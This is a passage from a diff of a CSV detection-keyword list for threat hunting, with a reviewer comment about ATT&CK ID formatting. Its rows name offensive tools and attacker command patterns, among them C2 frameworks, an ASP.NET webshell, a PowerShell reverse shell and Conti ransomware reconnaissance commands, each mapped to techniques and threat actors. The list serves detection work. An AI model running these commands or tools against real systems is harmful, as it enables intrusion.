PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" 
"*SharpView-master*","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/tevora-threat/SharpView/","1","1","N/A","10","9","850","206","2021-12-17T15:53:20Z","2018-07-24T21:15:04Z" -"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*sharpweb all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*SharpWebManager.cs*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" -"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - 
T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWebServer.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*SharpWifiGrabber.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*sharpwmi action=*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*SharpWMI.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*SharpWMI.Program*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*SharpWmiManager*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*sharpwmi-N*.exe*","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","78","37","2023-09-28T08:36:47Z","2021-01-20T13:08:24Z" 
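Review bot: The re-added `*SharpUp audit*` Covenant row writes sub-techniques with a hyphen (`T1573-001`, `T1059-001`, `T1574-001`, `T1570-001`), while other rows in the file use the dotted ATT&CK form (`T1573.001 - T1573.002` on the cobaltstrike rows). Because ` - ` is also the list separator in this column, the hyphenated IDs are easy to mis-split and will not match in an ATT&CK lookup or a technique-based dashboard. I would normalise the field to the dotted form, e.g. `T1573.001 - T1573.002 - T1059.001 - ...`. Each ID should also be checked against the current matrix while doing so, since some of them (for example `T1570-001`) may not correspond to a sub-technique that exists.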
@@ -16785,11 +16968,11 @@
 "*sharpyshell.aspx*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
 "*SharPyShell.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z"
 "*SharpZeroLogon*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z"
-"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
+"*SharpZeroLogon.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z"
 "*SharpZippo.exe*","offensive_tool_keyword","cobaltstrike","List/Read contents of Zip files (in memory and without extraction) using CobaltStrike's Execute-Assembly","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OG-Sadpanda/SharpZippo","1","1","N/A","10","10","55","10","2022-05-24T15:57:33Z","2022-05-24T15:52:31Z"
 "*ShawnDEvans/smbmap*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1554","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
-"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*ShawnDEvans/smbmap*","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","1","N/A","10","10","1555","344","2023-09-14T20:51:52Z","2015-03-16T13:15:00Z"
+"*shell 'cmd.exe /c*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
 "*shell net group *Domain Computers* /domain*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*shell net localgroup administrators*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*shell nltest /dclist*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
@@ -16798,34 +16981,34 @@
 "*shell whoami /user*","offensive_tool_keyword","ShadowForgeC2","ShadowForge Command & Control - Harnessing the power of Zoom API - control a compromised Windows Machine from your Zoom Chats.","T1071.001 - T1569.002 - T1059.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/0xEr3bus/ShadowForgeC2","1","0","N/A","10","10","35","5","2023-07-15T11:45:36Z","2023-07-13T11:49:36Z"
 "*shell whoami*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*shell.exe -s payload.txt*","offensive_tool_keyword","cobaltstrike","bypassAV cobaltstrike shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/jas502n/bypassAV-1","1","0","N/A","10","10","18","9","2021-03-04T01:51:14Z","2021-03-03T11:33:38Z"
-"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
-"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z"
+"*shell_shocked*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*shell_shocked*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*shell_startup_files_modification.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
 "*Shell3er.ps1*","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","shell spawning","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","1","N/A","N/A","1","56","11","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z"
 "*shellc *.bin *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
 "*shellc *.shellc *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
-"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
-"*ShellCmd sc qc *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3787","732","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*ShellCmd cmd.exe *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*ShellCmd copy *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
+"*ShellCmd net *","offensive_tool_keyword","covenant","Covenant commands - Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z"
